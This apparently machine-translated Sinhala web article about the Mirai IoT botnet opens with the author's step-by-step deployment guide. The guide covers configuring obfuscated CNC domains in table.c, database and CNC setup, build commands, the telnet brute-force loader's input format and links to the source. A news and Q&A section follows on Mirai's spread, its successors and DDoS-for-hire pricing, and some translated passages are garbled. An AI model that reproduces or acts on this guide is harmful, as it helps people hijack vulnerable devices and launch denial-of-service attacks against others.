— බොට්ස් brute telnet උසස් SYN ස්කෑනරයක් භාවිතා කරයි, එය qbot හි ඇති එකට වඩා 80x පමණ වේගවත්, සහ 20x අඩු සම්පත් භාවිතා කරයි. තිරිසන් ප්‍රතිඵලයක් සොයා ගන්නා විට, බොට් වෙනත් වසමක් විසඳා එය වාර්තා කරයි. ප්‍රතිඵල එන විට උපාංග වෙත ස්වයංක්‍රීයව පූරණය වීම සඳහා මෙය වෙනම සේවාදායකයකට සම්බන්ධ කර ඇත.
— කෲර ප්‍රතිඵල පෙරනිමියෙන් 48101 තොටේ යවනු ලැබේ. මෙවලම් තුළ ඇති scanListen.go නම් උපයෝගීතාව තිරිසන් ප්‍රතිඵල ලබා ගැනීමට භාවිතා කරයි (මම උච්චතම අවස්ථාවේ දී තත්පරයකට තිරිසන් ප්‍රතිඵල 500 ක් පමණ ලබා ගනිමින් සිටියෙමි). ඔබ දෝශ නිරාකරණ ප්‍රකාරයේදී ගොඩනඟන්නේ නම්, දෝශ නිරාකරණ ෆෝල්ඩරය තුළ උපයෝගිතා ස්කෑන් සවන්දීම ද්විමය දිස්වන බව ඔබ දැකිය යුතුය.

Mirai ස්වයං-ජනාධිපතිට සමාන පැතිරීමේ යාන්ත්‍රණයක් භාවිතා කරයි, නමුත් මම හඳුන්වන්නේ "තත්‍ය-කාල-පූරණය" ලෙසිනි. මූලික වශයෙන්, bots brute results, එය scanListen utility සමඟ සවන් දෙන සේවාදායකයකට යවන්න, එමඟින් ප්‍රතිඵල loader වෙත යවයි. මෙම ලූපය (brute -> scanListen -> load -> brute) real time loading ලෙස හඳුන්වයි.

Linux හි port exhaustion මග හැරීමට බහු IP ලිපින භාවිතා කිරීමට ලෝඩරය වින්‍යාසගත කළ හැක (පමණක් ports ප්‍රමාණයක් ඇත, එනම් 65k ට වඩා එකවර පිටතට යන සම්බන්ධතා ලබා ගැනීමට tuple හි ප්‍රමාණවත් වෙනසක් නොමැති බවයි - න්‍යායාත්මකව, මෙම අගය ගොඩක් අඩු). මට සමහර විට 60k — 70k එකවර පිටතට යන සම්බන්ධතා (සමගාමී පැටවීම) IP 5ක් පුරා පැතිරී ඇත.
Bot සතුව (table.c/table.h) තුළ අපැහැදිලි වූ වින්‍යාස විකල්ප කිහිපයක් ඇත. ./mirai/bot/table.h හි ඔයාට පුළුවන්වින්‍යාස විකල්ප සඳහා බොහෝ විස්තර සොයා ගන්න. කෙසේ වෙතත්, ./mirai/bot/table.c හි ඔබට වැඩ කිරීමට වෙනස් කිරීමට *අවශ්‍ය* විකල්ප කිහිපයක් තිබේ.

— TABLE_CNC_DOMAIN — සම්බන්ධ වීමට CNC හි වසම් නාමය — DDoS වළක්වා ගැනීම mirai සමඟ ඉතා විනෝදජනකයි, මිනිසුන් මගේ CNC වලට පහර දීමට උත්සාහ කරයි, නමුත් මම ඔවුන්ට නව IPs සොයා ගැනීමට වඩා වේගයෙන් එය යාවත්කාලීන කරමි, lol. පසුගාමී :)
— TABLE_CNC_PORT — සම්බන්ධ වීමට වරාය, එය දැනටමත් 23 ට සකසා ඇත
— TABLE_SCAN_CB_DOMAIN — තිරිසන් ප්‍රතිඵල සොයා ගන්නා විට, මෙම වසම එය වාර්තා කරනු ලැබේ
— TABLE_SCAN_CB_PORT — තිරිසන් ප්‍රතිඵල සඳහා සම්බන්ධ වීමට වරාය, එය දැනටමත් 48101 ලෙස සකසා ඇත.

./mirai/tools තුළ ඔබට enc.c නමින් යමක් හමුවනු ඇත — table.c ගොනුවෙහි තැබීමට දේවල් ප්‍රතිදානය කිරීමට ඔබ මෙය සම්පාදනය කළ යුතුය.

මෙම මිරායි නාමාවලිය තුළ ධාවනය කරන්න

./build.sh debug telnet

ඔබ ඒවා වින්‍යාස කර නොමැති නම් හරස් සම්පාදක එහි නොමැති වීම සම්බන්ධ දෝෂ කිහිපයක් ඔබට ලැබෙනු ඇත. මෙය හරි, enc මෙවලම සම්පාදනය කිරීමට බලපාන්නේ නැත

දැන්, ./mirai/debug ෆෝල්ඩරය තුළ ඔබ enc ලෙස හැඳින්වෙන සම්පාදනය කරන ලද ද්විමයයක් දැකිය යුතුය. උදාහරණයක් ලෙස, බොට් සඳහා සම්බන්ධ වීමට වසම් නාමය සඳහා අපැහැදිලි තන්තුවක් ලබා ගැනීමට, මෙය භාවිතා කරන්න:

./debug/enc string fuck.the.police.com
ප්‍රතිදානය මේ ආකාරයට විය යුතුය

XOR දත්ත බයිට් 20 ක්…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
උදාහරණයක් ලෙස TABLE_CNC_DOMAIN අගය යාවත්කාලීන කිරීමට, එම දිගු hex තන්තුව enc මෙවලම මඟින් සපයන ලද එක සමඟ ප්‍රතිස්ථාපනය කරන්න. එසේම, ඔබ "XOR' දත්ත බයිට් 20 ක්" දකිනු ඇත. මෙම අගය අවසාන තර්කය ද ප්‍රතිස්ථාපනය කළ යුතුය. උදාහරණයක් ලෙස, table.c රේඛාව මුලින් පෙනෙන්නේ මේ ආකාරයටයි
add_entry (TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
දැන් අපි enc tool එකෙන් වටිනාකම දන්න නිසා අපි ඒක මේ විදියට update කරනවා

add_entry (TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x20″); //fuck.the.police.com
සමහර අගයන් තන්තු වේ, සමහරක් වරාය වේ (uint16 ජාල අනුපිළිවෙලින් / විශාල එන්ඩියන්).
CNC වින්‍යාස කරන්න:
apt-get install mysql-server mysql-client

CNC වැඩ කිරීමට දත්ත සමුදාය අවශ්‍යයි. ඔබ දත්ත සමුදාය ස්ථාපනය කරන විට, එයට ගොස් පහත විධානයන් ක්‍රියාත්මක කරන්න:
http://pastebin.com/86d0iL9g

මෙය ඔබ සඳහා දත්ත සමුදායක් සාදනු ඇත. ඔබගේ පරිශීලක එකතු කිරීමට,

පරිශීලක අගයන් ඇතුලත් කරන්න (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
දැන්, ගොනුව වෙත යන්න ./mirai/cnc/main.go

මෙම අගයන් සංස්කරණය කරන්න
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "මුරපදය"
const DatabaseTable string = "mirai"
සඳහා තොරතුරු වෙත mysql සේවාදායකයඔබ දැන් ස්ථාපනය කර ඇත

හරස් සම්පාදක පහසුයි, සැකසීමට මෙම සබැඳියේ උපදෙස් අනුගමනය කරන්න. මෙම වෙනස්කම් බලපැවැත්වීම සඳහා ඔබ ඔබේ පද්ධතිය නැවත ආරම්භ කිරීම හෝ .bashrc ගොනුව නැවත පූරණය කළ යුතුය.

http://pastebin.com/1rRCc3aD
CNC, bot, සහ අදාළ මෙවලම්:
http://dopefile.pk/a9f2n9ewk8om
bot + CNC ගොඩනගන්නේ කෙසේද?
mirai ෆෝල්ඩරයේ, build.sh script එක ඇත.
./build.sh debug telnet

බොට් හි නිදොස් ද්විමය ප්‍රතිදානය කරන අතර එය CNC වෙත සම්බන්ධ විය හැකිද යන්න, ගංවතුර තත්ත්වය, ආදිය පිළිබඳ තොරතුරු මුද්‍රණය කරයි. ./mirai/debug ෆෝල්ඩරය වෙත සම්පාදනය කරයි
./build.sh telnet නිකුත් කරන්න

උපාංග මත පැටවිය යුතු අතිශයින් ඉවත් කරන ලද, කුඩා (60K පමණ) බොට් නිෂ්පාදනයට සූදානම් ද්විමය ප්‍රතිදානය කරයි. සියලුම ද්විමය ආකෘතියෙන් සම්පාදනය කරයි: “mirai.$ARCH” සිට ./mirai/release ෆෝල්ඩරය

ලෝඩරය STDIN වෙතින් ටෙල්නෙට් ඇතුළත් කිරීම් පහත ආකෘතියෙන් කියවයි:
ip:port user:pass
එය wget හෝ tftp තිබේදැයි හඳුනාගෙන, එය භාවිතා කර ද්විමය බාගත කිරීමට උත්සාහ කරයි. එසේ නොවේ නම්, එය wget ලෙස ප්‍රමාණවත් වන කුඩා ද්විමය (1kb පමණ) ප්‍රතිරාවය කරයි.
./build.sh

ලෝඩරය ගොඩනඟයි, ප්‍රශස්තිකරණය, නිෂ්පාදන භාවිතය, කලබලයක් නැත. ඔබ පූරණය සඳහා භාවිතා කරන ආකෘතිවල ගොනුවක් තිබේ නම්, ඔබට මෙය කළ හැකිය
cat file.txt | ./loader
සීමා කිරීමට මතක තබා ගන්න!

එය පැහැදිලියි, මම කිසිම ආකාරයක 1කින් 1 උපකාරක නිබන්ධන හෝ මගුලක් සපයන්නේ නැත, වැඩි කාලයක්. සියලුම ස්ක්‍රිප්ට් සහ සියල්ල පැය 1කට අඩු කාලයකින් වැඩ කරන බොට්නෙට් පිහිටුවීමට ඇතුළත් වේ. ඔබට තනි ප්‍රශ්න තිබේ නම් (CNC දත්ත සමුදායට සම්බන්ධ නොවන්නේ කෙසේද, මම මෙය මෙය කළෙමි) නමුත් “මගේ බොට් සම්බන්ධ නොවේ, එය නිවැරදි කරන්න” වැනි ප්‍රශ්න නොවේ නම් මම උදව් කිරීමට කැමැත්තෙමි.

මේක තමයි පහුගිය සති කිහිපයේ හැමෝම ලියපු ට්‍රෝජන් එක. එහි ආධාරයෙන් නිර්මාණය කරන ලද botnets හි වඩාත් ආකර්ෂණීය ජයග්‍රහණ අතර ටෙරාබිට් එකකට වඩා වැඩි ධාරිතාවක් සහ කුඩා අප්‍රිකානු රටක වේ.

මේ සඳහා ඔහු පරිගණක කීයක් වහල් කළාද?

කොහෙත්ම නැහැ. නැතහොත් අවම වශයෙන් ඉතා සුළු වශයෙන්. Mirai ගේ ඉලක්ක උපාංග කිසිසේත්ම පරිගණක නොවේ, නමුත් IoT උපාංග - වීඩියෝ පටිගත කරන්නන්, කැමරා, ටෝස්ටර් ... 3 මට්ටමේ සන්නිවේදනයේ සංඛ්‍යාලේඛනවලට අනුව, ඔක්තෝබර් අවසානය වන විට, මිලියන භාගයක් පමණ උපාංග දැනටමත් ට්‍රෝජන් පාලනයට යටත් විය.

සහ කුමක්, ඔහුට ශීතකරණ සහිත ඕනෑම කැමරාවක් අල්ලා ගත හැකිද?

ඇත්තෙන්ම නැහැ. Mirai Busybox ධාවනය වන උපාංග සඳහා සකස් කර ඇත - සරල කළ UNIX උපයෝගිතා කට්ටලයකි විධාන රේඛාව, embedded හි ප්‍රධාන අතුරු මුහුණත ලෙස භාවිතා වේ මෙහෙයුම් පද්ධති. ට්‍රෝජන් ARM, ARM7, MIPS, PPC, SH4, SPARC සහ x86 වැනි ඇතැම් වේදිකා වලට පමණක් පහර දෙයි. කර්මාන්තශාලා සැකසුම් හෝ ඉතා දුර්වල ආරක්ෂාවක් සහිත උපාංග පමණක් අවදානමට ලක්ව ඇත - ටෙල්නෙට් වරායට තිරිසන් බල ප්‍රහාරයක් භාවිතයෙන් ආසාදනය සිදු වේ, ඒ සඳහා පරිපාලක අක්තපත්‍රවල පෙරනිමි ලැයිස්තුව භාවිතා වේ.

මුරපද නොමැතිව කැමරා සඳහා මුළු අන්තර්ජාලයම සෙවීම කෙසේ හෝ අකාර්යක්ෂමයි - එසේ නොවේ ද?

නමුත් ඔවුන් නිවැරදිව අනුමාන කළේ නැත. The Atlantic හි මාධ්‍යවේදියෙක් සේවාදායකයක් කුලියට ගෙන ටෝස්ටර් ලෙස පෙනී සිටින වැඩසටහනක් ලිවීය. "ගෘහස්ථ උපකරණ" මත පළමු ප්රහාරය විනාඩි 40 කට පසුව සිදු විය! ඊළඟ පැය 11 තුළ ටෝස්ටරය 300 වතාවකට වඩා හැක් කරන ලදී. කාරණය නම් බොට්නෙට් පෙර නොවූ විරූ ප්‍රමාණයකට ළඟා වී ඇති අතර ඒවා සඳහා IPv4 ලිපින අවකාශය ඉතා කුඩාය. එපමණක් නොව, හැකර්වරුන් අවදානමට ලක්විය හැකි උපාංග අතින් සොයන්නේ නැති බව මතක තබා ගැනීම වටී - මෙය සිදු කරනු ලබන්නේ botnet සාමාජිකයින් විසිනි. තවද, අලුතින් පරිවර්තනය කරන ලද සෑම "සේවකයෙකුම" ද වින්දිතයින් සෙවීමට පටන් ගන්නා බැවින්, botnet ඝාතීය ලෙස වර්ධනය වේ.

ජ්යාමිතික වශයෙන්ද? ඉතින් අවුරුද්දකින් බොට්නෙට් වල උපාංග ට්‍රිලියන ගණනක් අඩංගු වේවිද?!

ඇත්ත වශයෙන්ම නොවේ 😀 කාරණය නම් IoT උපාංග ගණන සීමිත වීමයි. තවද මෙය දැනටමත් තරමක් දැවෙන ගැටලුවකි. මිරායි හි කතුවරයා තම ජාලයේ උපරිම උපාංග සංඛ්‍යාව 380 දහසක් බව පිළිගෙන ඇති අතර, ප්‍රහාර කිහිපයකින් පසුව, පරිශීලකයින් සහ සපයන්නන් ආරක්ෂිත පියවර ගැනීමට පටන් ගත් විට, උපාංග සංඛ්‍යාව 300,000 දක්වා පහත වැටී අඛණ්ඩව පහත වැටේ.

Mirai හි ප්‍රභව කේතය ප්‍රසිද්ධියේ ලබා දීමෙන් පසුව, බොහෝ හැකර්වරු එය භාවිතා කිරීමට පටන් ගත්හ. දැනට, මෙම Trojan මත පදනම් වූ විශාල botnets සංඛ්යාව 52 ක් පමණ වේ. සෑම උපාංගයක්ම එක් ජාලයකට පමණක් අයත් විය හැකි බව පැහැදිලි කිරීම වටී - උපාංගයක් අල්ලා ගත් වහාම, අනිෂ්ට මෘදුකාංග එය නැවත ආසාදනය වීමෙන් ආරක්ෂා කරයි. උපාංගය වෙනත් "හිමිකරු" වෙත මාරු කළ හැකි එකම අවස්ථාව වන්නේ උපාංගය නැවත ආරම්භ කරන විටය. විශේෂඥයන් පවසන පරිදි, නැවත ආරම්භ කිරීමෙන් පසු තත්පර 30 ක් ඇතුළත උපාංගය නැවත ආසාදනය වනු ඇත.

ඉතින් Mirai වල කාර්යක්ෂමතාව අඩු වෙනවාද?

ඔව්. හැකර්වරුන්ට සීමිත සම්පත් ප්‍රමාණයක් සඳහා සටන් කිරීමට බල කෙරෙයි, එය වර්ධනය වීමට වඩා අඩු වෙමින් පවතී (පූර්වාරක්ෂාව හේතුවෙන්). හැකර්වරුන් අතිශයින්ම ආත්මාර්ථකාමී වීම නිසා තත්වය වඩාත් සංකීර්ණ වේ - නිදසුනක් ලෙස, බොට්නෙට් හි ප්‍රධාන විධාන සහ පාලන (සී සහ සී) සේවාදායකයක් සරලව ක්‍රියා විරහිත කළ පසු - දැන් බොට්නෙට් නිෂ්ඵල සහ නව ප්‍රහාරවලට අනාරක්ෂිත වී ඇත. සෑම නව ජාලය Mirai මත පදනම් වූ පෙර ඒවාට වඩා කුඩා වන අතර අඩු බල ප්‍රහාර පමණක් සිදු කිරීමට හැකි වනු ඇත. උදාහරණයක් ලෙස, එක්සත් ජනපද මැතිවරණ සමයේදී ක්ලින්ටන් සහ ට්‍රම්ප් වෙබ් අඩවි වලට දුර්වල ප්‍රහාර එල්ල කරන ලදී. ඔවුන් කිසිදු හානියක් සිදු නොකළ අතර, කිසිවකු ඒවා කිසිලෙසකින් දුටුවේ නැත (මෙම ට්රෝජන්ගේ ක්රියාවන් විශේෂයෙන් නිරීක්ෂණය කරන සමාගම හැර).

එය පැහැදිලියි. මෙම ට්‍රෝජන් ගැන දන්නා තවත් රසවත් තොරතුරු මොනවාද?

එය Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor සහ Torlus යන නම්වලින් හඳුන්වන තවත් ට්‍රෝජන් වර්ගයක අනුප්‍රාප්තිකයා වේ. දෙවැන්න එකම මට්ටමේ 3 සන්නිවේදනයන්ට අනුව වෙබ් කැමරා මිලියනයක් පමණ යටත් කර ගැනීමට හැකි වීම සඳහා ප්‍රසිද්ධය. බොහෝ botnets Mirai හි පිරිසිදු පිටපතක් භාවිතා නොකරන බව ද දන්නා අතර, නමුත් ඔවුන්ගේම, නවීකරණය කරන ලද අනුවාද (එය තරමක් බලාපොරොත්තු වේ).

තවත් සිත්ගන්නා කරුණක් RuNet භාවිතා කරන්නන් සොයාගෙන ඇත ප්රභව කේතයමිරායි රුසියානු හෝඩුවාවක් - cnc/admin.go ගොනුවේ රුසියානු භාෂාවෙන් අදහස් ප්‍රතිදානයක් ඇත:

cnc/admin.go: this.conn.Write(byte(“\033))

අනෙක් අතට, එය විහිළුවක් ලෙස පෙනේ - "ගිණුම් පරීක්ෂා කිරීම..." යනු "ගිණුම් පරීක්ෂා කිරීමේ" පැහැදිලි පිටපතක් (යන්ත්‍ර පරිවර්තනය?) වේ.

වැනි විශාල වෙබ් අඩවිවලට පසුගිය මාසයේදී ප්‍රහාර එල්ල විය ට්විටර්හෝ Spotify, ඔවුන්ව තාවකාලිකව අක්‍රීය කරන ලදී. මේ සඳහා botnet එකක් භාවිතා කර ඇත මිරායි, Internet of Things උපාංග 400-500 දහසක් ඒකාබද්ධ කිරීම. දැන් මවු පුවරු මාධ්‍යවේදීන් දැනගෙන ඇත්තේ හැකර්වරුන් දෙදෙනෙකු බොට්නෙට් පාලනය අල්ලාගෙන එහි නව අනුවාදයක් නිර්මාණය කිරීමට සමත් වූ බවයි - එය දැනටමත් උපාංග මිලියනයක් ඒකාබද්ධ කරයි. ජර්මානු සැපයුම්කරුගේ ග්‍රාහකයින් එහි බලය අත්විඳ ඇත ඩොයිෂ් ටෙලිකොම්, පසුගිය සති අන්තයේ ජාලය අක්‍රිය විය.

මිරායි සඳහා දඩයම් කිරීම

මෙම අද්භූත හැකර්වරුන් දෙදෙනාගෙන් එක් අයෙකු සමඟ කතා කිරීමට මාධ්‍යවේදීන් සමත් විය - ඔහු BestBuy යන අන්වර්ථ නාමය භාවිතා කරයි. සංකේතාත්මක ඔන්ලයින් චැට් එකකදී ඔහු ඔවුන්ට පැවසුවේ මිරායි පාලනය සඳහා හැකර්වරුන් අතර සැබෑ අරගලයක් පවතින බවයි. එහි මෘදුකාංගයේ දුර්වලතාවයක් මෑතකදී සොයා ගන්නා ලදී. එහි භාවිතය, එහි වේගය සමඟ, BestBuy සහ එහි හවුල්කරු Popopret හට බොහෝ botnet හි පාලනය අල්ලා ගැනීමට සහ එයට නව උපාංග එක් කිරීමට ඉඩ දිය හැකිය.

මීට පෙර, අපගේ ප්‍රවීණයන් Mirai botnet හි කේතය අධ්‍යයනය කළහ - එය අන්තර්ජාලයේ දේවල් උපාංග සඳහා විශේෂයෙන් නිර්මාණය කර නොමැති බව පෙනී ගියේය. අනිෂ්ට මෘදුකාංග පෙරනිමි පිවිසුම් සහ මුරපද (පරිපාලක:පරිපාලක, root:මුරපදය, ආදිය) සමඟ ජාලයට සම්බන්ධ උපාංග සඳහා සෙවුම් කරයි. මෙයින් අදහස් කරන්නේ, න්‍යායාත්මකව, ගෘහ පරිගණක සහ සේවාදායක හෝ රවුටර ඇතුළු ඕනෑම උපාංගයක් එයට ඇතුළත් කළ හැකි බවයි.

IoT උපාංග- සාමාන්යයෙන් රවුටර - ඇතුළත් වේ Mirai botnetඑය නැවත ආරම්භ වන තුරු - එවිට පණුවා ඔවුන්ගේ මතකයෙන් මකා දමනු ලැබේ. කෙසේ වෙතත්, botnet නිරන්තරයෙන් අවදානමට ලක්විය හැකි උපාංග සඳහා අන්තර්ජාලය පරිලෝකනය කරයි, එවිට "සුව කරන ලද" උපාංගයක් ඉක්මනින් නැවත එහි කොටසක් බවට පත්විය හැකිය. හැකිතාක් උපාංග ප්‍රමාණයක් ආසාදනය කරන ප්‍රථමයා වීමට හැකර්වරුන් අතර සැබෑ තරඟයක් තිබේ.

නව මිරායි හි නිර්මාණකරුවන් තරඟකරුවන් අභිබවා යාමට සමත් වන්නේ කෙසේද යන්න පිළිබඳ තොරතුරු නොමැත. කෙසේ වෙතත්, ඔවුන් වාර්තාකරුවන්ට පැවසුවේ ඔවුන් කලින් botnet හි කොටසක් වූ ඒවා ඇතුළුව අවදානමට ලක්විය හැකි උපාංග පරිලෝකනය කිරීමට ඔවුන්ගේම botnet භාවිතා කරන බවයි.

"ඇයි Mirai විසින් Mirai දඩයම් කර මුල් පිටපත ගිල දමන්නේ නැත්තේ," BestBuy පවසයි.

මිරායි විතරක් නෙවෙයි

කෙසේ වෙතත්, නව botnet පැරණි Mirai උපාංග සහ පෙරනිමි මුරපද සහිත නව ඒවා අවශෝෂණය කර ගත්තා පමණක් නොවේ. එහි නිර්මාපකයින් IoT උපාංගවල ස්ථිරාංගවල දින 0 දුර්වලතා ද භාවිතා කරයි. එවැනි "ඒකාබද්ධ" botnets ක්ෂණිකව මතුවීම පිළිබඳව විශේෂඥයන් කලින් අනාවැකි පළ කළහ.

ඔවුන්ට එරෙහි සටන සැලකිය යුතු ලෙස සංකීර්ණ වේ - මිරායිට ප්‍රතිරෝධය දැක්වීම සඳහා අවසාන උපාංගයේ පරිශීලකයාට එයට ප්‍රවේශ වීම සඳහා පිවිසුම් සහ මුරපදය වෙනස් කිරීමට පමණක් අවශ්‍ය නම්, ඔහුට තමාගේම ගැජටයේ ඇති දුර්වලතා සමඟ සාර්ථකව කටයුතු කිරීමට නොහැකි වනු ඇත. .

DDoS 700 Gbps

හැකර්වරුන් BestBuy සහ Popopret ඔවුන්ගේ සේවාවන් ප්‍රචාරණය කිරීම ආරම්භ කර ඇත - ඔවුන් ඔවුන්ගේ ප්‍රවේශය ලබා දේ නව අනුවාදයමිරායි, XMPP/Jabber හරහා ස්පෑම් පණිවිඩ යැවීම,

හැකර්ට අනුව, ඔවුන් පාරිභෝගිකයින්ට සේවා පැකේජ කිහිපයක් ලබා දෙයි. මිල අඩු එකක් නම් වටිනවා $2 000 - මෙම මුදල සඳහා ගනුදෙනුකරුවන්ට කුලියට ගත හැකිය 20,000 සිට 25,000 දක්වාප්‍රහාර අතර මිනිත්තු පහළොවක විවේකයක් සහිතව සති දෙකක් දක්වා මුරකරුවන් දියත් කිරීමට botnet නෝඩ්. පිටුපස $15 000 හෝ $20 000 ගනුදෙනුකරුවන්ට දැන් බොට් 600,000 ක් විනාඩි 30 ක් හෝ 15 ක විවේකයක් සමඟ පැය දෙකක ප්‍රහාර දියත් කිරීමට අවස්ථාව තිබේ. දෙවන අවස්ථාවේ දී, ප්රහාරක බලය වනු ඇත 700 Gbit/sහෝ ඊට වැඩි.

අපේක්ෂාවන්

ආරක්ෂාව IoT උපාංගබොහෝ විට තරමක් අඩු මට්ටමක පවතී - මෙය පැහැදිලි වන්නේ විකුණුම්කරුවන් බොහෝ විට අතිරේක ක්‍රියාමාර්ග ක්‍රියාත්මක කිරීමට උනන්දු නොවන බැවිනි තොරතුරු ආරක්ෂාව. ඔවුන් තම නිෂ්පාදන භාවිතා කිරීමේ පහසුව ප්‍රචාරණය කරයි, නමුත් සියලුම අමතර ආරක්ෂක පියවරයන් සීමා කිරීම් සහ සම්පත් අවශ්‍ය වේ.

ඉහත සඳහන් කළ පරිදි, වඩාත් දියුණු botnets වලින් පරිශීලකයින් ආරක්ෂා කළ හැක්කේ (රවුටර සම්බන්ධයෙන්) අවසන් උපාංග සංවර්ධකයින් හෝ සපයන්නන් පමණි. Mirai හි නව අනුවාදයේ ප්‍රහාරයෙන් බලපෑමට ලක් වූ ජර්මානු සැපයුම්කරු Deutsche Telekom, අවදානමට ලක්විය හැකි රවුටර සපයන්නන් සමඟ “ව්‍යාපාරික සබඳතා නැවත සලකා බලන” බව දැනටමත් නිවේදනය කර ඇත. ස්පීඩ්පෝට්, සමාගම ආකේඩියන්.

අවසාන වශයෙන්, එක් අතකින් සපයන්නන්ගේ පැත්තෙන් උපාංග දැඩි පාලනයක් හඳුන්වා දීම සහ අනෙක් පැත්තෙන් IoT සඳහා ප්‍රමිති සහ නියාමන ලියකියවිලි සංවර්ධනය කිරීම තුළින් අන්තර්ජාලයේ දේවල් වල ආරක්‍ෂිත මට්ටම ඉහළ නැංවීමට හැකි වනු ඇත. . ස්වයංක්‍රීය ක්‍රියාවලි පාලන පද්ධතිවල ආරක්ෂාව සහතික කිරීම සඳහා බොහෝ රටවල මෙවැනි ක්‍රියාමාර්ග දැනටමත් ගෙන ඇත. මෙම දිශාවේ පළමු පියවර දැනටමත් ගෙන ඇත - උදාහරණයක් ලෙස, තොරතුරු තාක්ෂණ වෙළෙන්දන් කිහිප දෙනෙකු සැප්තැම්බර් මාසයේදී ලේඛනයක් ප්‍රකාශයට පත් කරන ලදී කාර්මික අන්තර්ජාල ආරක්ෂාවරාමුව (IISF)- එය "කාර්මික අන්තර්ජාලයේ" කොටසක් ලෙස දේවල් අන්තර්ජාලය සලකා බැලීමට යෝජනා කරයි.

කෙසේ වෙතත්, ගැටළුව තවමත් විසඳා ගැනීමට නොහැකි වී ඇත, සහ හැකර් BestBuy සහ Popopretමහා පරිමාණයෙන් ඒකාධිකාරයක් ලබා ගත හැකිය DDoS ප්රහාරසමඟ අමුත්තන්. මෙය තරමක් කණගාටුදායක කරුණකි, නමුත් හැකර්වරුන් සමඟ සංවාදයකදී මවු පුවරුවඔවුන්ගේ ක්‍රියාකාරකම් ලාභයෙන් පමණක් නොව සදාචාරාත්මක මූලධර්මවලින් ද මෙහෙයවනු ලබන බව ප්‍රකාශ කළේය. එබැවින් BestBuy පැවසුවේ තීරණාත්මක යටිතල පහසුකම් සමඟ වැඩ කරන සමාගම්වල IP ලිපිනවලට පහර දීමට ගනුදෙනුකරුවන්ට ඉඩ නොදෙන බවයි.